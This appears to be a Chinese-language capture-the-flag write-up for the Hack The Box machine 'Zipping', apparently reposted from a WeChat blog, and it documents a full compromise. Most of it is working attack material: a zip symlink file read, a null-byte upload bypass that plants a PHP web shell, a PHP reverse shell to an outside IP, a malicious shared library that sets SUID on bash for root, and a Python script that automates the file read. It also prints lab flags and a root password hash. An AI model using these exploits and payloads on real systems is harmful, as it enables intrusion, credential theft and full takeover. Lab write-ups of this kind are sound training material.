HTB-Zipping笔记

admin 2024年8月5日22:46:50评论4 views字数 13838阅读46分7秒阅读模式

HTB-Zipping笔记

先扫描靶机

# nmap -sC -sV -Pn 10.10.11.229Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 11:50 CSTNmap scan report for 10.10.11.229Host is up (0.34s latency).Not shown: 998 closed tcp ports (reset)PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 9.0p1 Ubuntu 1ubuntu7.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   256 9d:6e:ec:02:2d:0f:6a:38:60:c6:aa:ac:1e:e0:c2:84 (ECDSA)|_  256 eb:95:11:c7:a6:fa:ad:74:ab:a2:c5:f6:a4:02:18:41 (ED25519)80/tcp open  http    Apache httpd 2.4.54 ((Ubuntu))|_http-title: Zipping | Watch store|_http-server-header: Apache/2.4.54 (Ubuntu)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds

HTB-Zipping笔记

进入公司,可以看简介,大概知道该公司是一家男女手表制造商,对其进行目录fuzz

HTB-Zipping笔记

# dirsearch -u http://10.10.11.229/   
  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                               (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                                                                                                                                                                     Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.11.229/-_23-09-06_11-58-22.txt
Error Log: /root/.dirsearch/logs/errors-23-09-06_11-58-22.log
Target: http://10.10.11.229/
[11:58:23] Starting: [11:58:36] 403 -  277B  - /.ht_wsr.txt                                     [11:58:36] 403 -  277B  - /.htaccess_orig                                  [11:58:36] 403 -  277B  - /.htaccess.orig                                  [11:58:36] 403 -  277B  - /.htaccess_extra[11:58:36] 403 -  277B  - /.htaccess.bak1                                  [11:58:36] 403 -  277B  - /.htaccess.save[11:58:36] 403 -  277B  - /.htaccess_sc[11:58:36] 403 -  277B  - /.htaccessOLD2[11:58:36] 403 -  277B  - /.htaccessBAK[11:58:36] 403 -  277B  - /.html[11:58:36] 403 -  277B  - /.htaccess.sample[11:58:36] 403 -  277B  - /.htaccessOLD[11:58:36] 403 -  277B  - /.httr-oauth                                     [11:58:36] 403 -  277B  - /.htpasswd_test[11:58:36] 403 -  277B  - /.htm                                            [11:58:37] 403 -  277B  - /.htpasswds                                      [11:58:41] 403 -  277B  - /.php                                            [11:59:33] 301 -  313B  - /assets  ->  http://10.10.11.229/assets/          [11:59:33] 200 -    2KB - /assets/                                          [12:00:06] 200 -   16KB - /index.php                                        [12:00:06] 200 -   16KB - /index.php/login/                                 [12:00:41] 403 -  277B  - /server-status                                    [12:00:41] 403 -  277B  - /server-status/                                   [12:00:42] 301 -  311B  - /shop  ->  http://10.10.11.229/shop/              [12:00:55] 200 -    5KB - /upload.php                                       [12:00:56] 403 -  277B  - /uploads/                                         [12:00:56] 301 -  314B  - /uploads  ->  http://10.10.11.229/uploads/                                                                                     Task Completed

HTB-Zipping笔记

扫出了upload地址,该网站有上传的功能,该功能只能上传zip格式的文件,我们可以创建一个symlink并将其压缩以读取服务器上的文件,有个LFI漏洞

ln -s ../../../../../../../etc/passwd  passwd.pdfzip --symlinks passwd.zip passwd.pdf

上传后,然后点击生成pdf的路径,抓包

HTB-Zipping笔记

HTB-Zipping笔记

可以通过这个LFI漏洞读取upload.php的代码

<html><html lang="en"><head>        <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="Start your development with Creative Design landing page.">    <meta name="author" content="Devcrud">    <title>Zipping | Watch store</title>
    <!-- font icons -->    <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">
    <!-- Bootstrap + Creative Design main styles -->        <link rel="stylesheet" href="assets/css/creative-design.css">
</head><body data-spy="scroll" data-target=".navbar" data-offset="40" id="home">    <!-- Page Header -->    <header class="header header-mini">       <div class="header-title">Work with Us</div>       <nav aria-label="breadcrumb">         <ol class="breadcrumb">            <li class="breadcrumb-item"><a href="index.php">Home</a></li>            <li class="breadcrumb-item active" aria-current="page">Work with Us</li>         </ol>      </nav>    </header> <!-- End Of Page Header -->
    <section id="work" class="text-center">        <!-- container -->        <div class="container">            <h1>WORK WITH US</h1>            <p class="mb-5">If you are interested in working with us, do not hesitate to send us your curriculum.<br> The application will only accept zip files, inside them there must be a pdf file containing your curriculum.</p>
            <?php            if(isset($_POST['submit'])) {              // Get the uploaded zip file              $zipFile = $_FILES['zipFile']['tmp_name'];              if ($_FILES["zipFile"]["size"] > 300000) {                echo "<p>File size must be less than 300,000 bytes.</p>";              } else {                // Create an md5 hash of the zip file                $fileHash = md5_file($zipFile);                // Create a new directory for the extracted files                $uploadDir = "uploads/$fileHash/";                // Extract the files from the zip                $zip = new ZipArchive;                if ($zip->open($zipFile) === true) {                  if ($zip->count() > 1) {                  echo '<p>Please include a single PDF file in the archive.<p>';                  } else {                  // Get the name of the compressed file                  $fileName = $zip->getNameIndex(0);                  if (pathinfo($fileName, PATHINFO_EXTENSION) === "pdf") {                    mkdir($uploadDir);        echo exec('7z e '.$zipFile. ' -o' .$uploadDir. '>/dev/null');                    echo '<p>File successfully uploaded and unzipped, a staff member will review your resume as soon as possible. Make sure it has been uploaded correctly by accessing the following path:</p><a href="'.$uploadDir.$fileName.'">'.$uploadDir.$fileName.'</a>'.'</p>';                  } else {                    echo "<p>The unzipped file must have  a .pdf extension.</p>";                  }                 }                } else {                  echo "Error uploading file.";                }
              }            }            ?>
            <!-- Submit File -->            <form id="zip-form" enctype="multipart/form-data" method="post" action="upload.php">              <div class="mb-3">                <input type="file" class="form-control" name="zipFile" accept=".zip">              </div>              <button type="submit" class="btn btn-primary" name="submit">Upload</button>            </form><!-- End submit file -->
        </div><!-- End of Container-->          </section><!-- End of Contact Section -->    <!-- Section -->    <section class="pb-0">        <!-- Container -->        <div class="container">            <!-- Pre footer -->            <div class="pre-footer">                <ul class="list">                    <li class="list-head">                        <h6 class="font-weight-bold">ABOUT US</h6>                    </li>                    <li class="list-body">                      <p>Zipping Co. is a company that is dedicated to producing high-quality watches that are both stylish and functional. We are constantly pushing the boundaries of what is possible with watch design and are known for their commitment to innovation and customer service.</p>                        <a href="#"><strong class="text-primary">Zipping</strong> <span class="text-dark">Watch Store</span></a>                    </li>                </ul>                <ul class="list">                    <li class="list-head">                        <h6 class="font-weight-bold">USEFUL LINKS</h6>                    </li>                    <li class="list-body">                        <div class="row">                            <div class="col">                                <a href="#">Link 1</a>                                <a href="#">Link 2</a>                                <a href="#">Link 3</a>                                <a href="#">Link 4</a>                            </div>                            <div class="col">                                <a href="#">Link 5</a>                                <a href="#">Link 6</a>                                <a href="#">Link 7</a>                                <a href="#">Link 8</a>                            </div>                        </div>                    </li>                </ul>                <ul class="list">                    <li class="list-head">                        <h6 class="font-weight-bold">CONTACT INFO</h6>                    </li>                    <li class="list-body">                        <p>Contact us and we'll get back to you within 24 hours.</p>                        <p><i class="ti-location-pin"></i> 12345 Fake ST NoWhere AB Country</p>                        <p><i class="ti-email"></i>  [email protected]</p>                        <div class="social-links">                            <a href="javascript:void(0)" class="link"><i class="ti-facebook"></i></a>                            <a href="javascript:void(0)" class="link"><i class="ti-twitter-alt"></i></a>                            <a href="javascript:void(0)" class="link"><i class="ti-google"></i></a>                            <a href="javascript:void(0)" class="link"><i class="ti-pinterest-alt"></i></a>                            <a href="javascript:void(0)" class="link"><i class="ti-instagram"></i></a>                            <a href="javascript:void(0)" class="link"><i class="ti-rss"></i></a>                        </div>                    </li>                </ul>             </div><!-- End of Pre footer -->            
            <!-- foooter -->            <footer class="footer">                <p>Made by <a href="https://github.com/xdann1">xDaNN1</p>            </footer><!-- End of Footer-->                      </div><!--End of Container -->          </section><!-- End of Section -->

</body></html>

这里就是产生LFI漏洞的原因

HTB-Zipping笔记

该代码检查提取的文件是否具有pdf扩展名,我们可以尝试注入一个空字节�0来终止php之后的字符串,但是pathinfo()函数还是以pdf形式返回,首先创建一个php文件测试,然后使用zip压缩

https://book.hacktricks.xyz/pentesting-web/file-upload#bypass-file-extensions-checks

<?phpecho "jinitaimei";?>
zip null.zip test.phpX.pdf

接下来使用hexeditor工具来修改压缩包,修改58字节,修改成�0

HTB-Zipping笔记

修改后然后保存,上传到靶机,先把后面.pdf去除,可以得到php的内容

HTB-Zipping笔记

HTB-Zipping笔记

用同样的办法,修改php文件上传shell,记得转换url编码

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

HTB-Zipping笔记

php -r '$sock=fsockopen("10.10.14.5",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'

成功拿到shell,该靶场有定时删除文件的功能

HTB-Zipping笔记

HTB-Zipping笔记

拿到user flag:ee453eace87abef17b87c0608c81874e,输入sudo -l查看提权特性

rektsu@zipping:/home/rektsu$ sudo -lsudo -lMatching Defaults entries for rektsu on zipping:    env_reset, mail_badpass,    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User rektsu may run the following commands on zipping:    (ALL) NOPASSWD: /usr/bin/stockrektsu@zipping:/home/rektsu$

HTB-Zipping笔记

运行strings命令查看可以显示密码

rektsu@zipping:/home/rektsu$ strings /usr/bin/stockstrings /usr/bin/stock/lib64/ld-linux-x86-64.so.2mgUafgetsstdinputsexitfopen__libc_start_mainfprintfdlopen__isoc99_fscanf__cxa_finalizestrchrfclose__isoc99_scanfstrcmp__errno_locationlibc.so.6GLIBC_2.7GLIBC_2.2.5GLIBC_2.34_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTablePTE1u+UHHakaizeSt0ckM4nager/root/.stock.csvEnter the password: Invalid password, please try again.================== Menu ==================1) See the stock2) Edit the stock3) Exit the programSelect an option: You do not have permissions to read the fileFile could not be opened.================== Stock Actual ==================Colour     Black   Gold    SilverAmount     %-7d %-7d %-7dQuality   Excelent Average PoorAmount    %-9d %-7d %-4dExclusive Yes    NoAmount    %-4d   %-4dWarranty  Yes    No================== Edit Stock ==================Enter the information of the watch you wish to update:Colour (0: black, 1: gold, 2: silver): Quality (0: excelent, 1: average, 2: poor): Exclusivity (0: yes, 1: no): Warranty (0: yes, 1: no): Amount: Error: The information entered is incorrect%d,%d,%d,%d,%d,%d,%d,%d,%d,%dThe stock has been updated correctly.;*3$"GCC: (Debian 12.2.0-3) 12.2.0Scrt1.o__abi_tagcrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrystock.c__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_start_main@GLIBC_2.34__errno_location@GLIBC_2.2.5_ITM_deregisterTMCloneTable__isoc99_fscanf@GLIBC_2.7puts@GLIBC_2.2.5stdin@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5_finistrchr@GLIBC_2.2.5fgets@GLIBC_2.2.5__data_startstrcmp@GLIBC_2.2.5dlopen@GLIBC_2.34fprintf@GLIBC_2.2.5__gmon_start____dso_handle_IO_stdin_usedcheckAuth_end__bss_startmainfopen@GLIBC_2.2.5__isoc99_scanf@GLIBC_2.7exit@GLIBC_2.2.5__TMC_END___ITM_registerTMCloneTable__cxa_finalize@GLIBC_2.2.5_init.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.commentrektsu@zipping:/home/rektsu$

密码是:St0ckM4nager

HTB-Zipping笔记

只要输入了正确的密码,可执行文件用于查看和修改位于/root/.stock.csv的库存,然后使用strace,对stock文件进行解析

rektsu@zipping:/usr/bin$ strace ./stockstrace ./stockexecve("./stock", ["./stock"], 0x7fffc46a3500 /* 16 vars */) = 0brk(NULL)                               = 0x55ba794bb000arch_prctl(0x3001 /* ARCH_??? */, 0x7fff80acc340) = -1 EINVAL (Invalid argument)mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a950f000access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 4newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=18225, ...}, AT_EMPTY_PATH) = 0mmap(NULL, 18225, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f67a950a000close(4)                                = 0openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4read(4, "177ELF2113��������3�>�1���32062�����"..., 832) = 832pread64(4, "6���4���@�������@�������@�������"..., 784, 64) = 784newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=2072888, ...}, AT_EMPTY_PATH) = 0pread64(4, "6���4���@�������@�������@�������"..., 784, 64) = 784mmap(NULL, 2117488, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f67a9200000mmap(0x7f67a9222000, 1544192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x22000) = 0x7f67a9222000mmap(0x7f67a939b000, 356352, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x19b000) = 0x7f67a939b000mmap(0x7f67a93f2000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x1f1000) = 0x7f67a93f2000mmap(0x7f67a93f8000, 53104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f67a93f8000close(4)                                = 0mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a9507000arch_prctl(ARCH_SET_FS, 0x7f67a9507740) = 0set_tid_address(0x7f67a9507a10)         = 3332set_robust_list(0x7f67a9507a20, 24)     = 0rseq(0x7f67a9508060, 0x20, 0, 0x53053053) = 0mprotect(0x7f67a93f2000, 16384, PROT_READ) = 0mprotect(0x55ba77512000, 4096, PROT_READ) = 0mprotect(0x7f67a9545000, 8192, PROT_READ) = 0prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0munmap(0x7f67a950a000, 18225)           = 0newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0getrandom("xeaxb9xf4x36x03x6fxa2x87", 8, GRND_NONBLOCK) = 8brk(NULL)                               = 0x55ba794bb000brk(0x55ba794dc000)                     = 0x55ba794dc000newfstatat(0, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0write(1, "Enter the password: ", 20Enter the password: )    = 20read(0, St0ckM4nagerSt0ckM4nager"St0ckM4nagern", 1024)         = 13openat(AT_FDCWD, "/home/rektsu/.config/libcounter.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)write(1, "n================== Menu ======="..., 44================== Menu ==================) = 44write(1, "n", 1)                       = 1write(1, "1) See the stockn", 171) See the stock)      = 17write(1, "2) Edit the stockn", 182) Edit the stock)     = 18write(1, "3) Exit the programn", 203) Exit the program)   = 20write(1, "n", 1

HTB-Zipping笔记

上面显示正在调用libcounter.so,我们可以访问该路径/home/rektsu/.config/,可以创建一个恶意libcounter.so并放在那里

C语言提权

#include <stdlib.h>#include <unistd.h>
void _init() {    setuid(0);    setgid(0);    system("chmod u+s /bin/bash");}
gcc -shared -fPIC -nostartfiles -o libcounter.so lib.c

然后上传到/home/rektsu/.config/里面,再运行文件

bash-5.2$ sudo /usr/bin/stockEnter the password: St0ckM4nager
================== Menu ==================
1) See the stock2) Edit the stock3) Exit the program
Select an option: 3bash-5.2$ /bin/bash -pbash-5.2# iduid=1001(rektsu) gid=1001(rektsu) euid=0(root) groups=1001(rektsu)bash-5.2#

HTB-Zipping笔记

成功拿到root flag:db3ce5545891c0a6c87c229352495f5a

HTB-Zipping笔记

root:$y$j9T$IYa44JPNfCWV4rqT1W1Kj/$xiHZCNOyiAOLgnHZ06gdF9jWPNR9ixmhsCwFu0Hgy9/:19548:0:99999:7:::

 

国外大佬的一键拿user flag

import osfrom bs4 import BeautifulSoupimport requests
if not os.path.exists("tmp"):        os.mkdir("tmp")
file_to_read = input("File to read: ")print("Creating symlink..")os.chdir("tmp/")os.system(f"ln -s {file_to_read} symlink.pdf")print("Zipping..")os.system(f"zip -r --symlinks sym.zip symlink.pdf")os.system(f"rm symlink.pdf && cp sym.zip ../")print("Done! Zip file: sym.zip")
print("Uploading file..")MIP = "10.10.11.229"file = {    'zipFile': ('sym.zip', open('sym.zip','rb'),'application/zip'),    'submit': (None,'')}headers = {"Host":MIP,"User-Agent":"Mozilla/5.0 (X11;Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"}s  = requests.Session()r = s.get(f"http://{MIP}",headers=headers)r = s.get(f"http://{MIP}/upload.php", headers=headers)r = s.post(f"http://{MIP}/upload.php",files=file,headers=headers)
soup = BeautifulSoup(r.text,features="lxml")
uuid=""for a in soup.find_all("a",href=True):        if "uploads" in a['href']:                uuid = a['href'].split("/")[1]print("File UUID: ",uuid)print("nReading file..")r = s.get(f"http://{MIP}/uploads/{uuid}/symlink.pdf")print(r.text)

 

原文始发于微信公众号(hades zorejt):HTB-Zipping笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日22:46:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Zipping笔记https://cn-sec.com/archives/2013995.html

发表评论

匿名网友 填写信息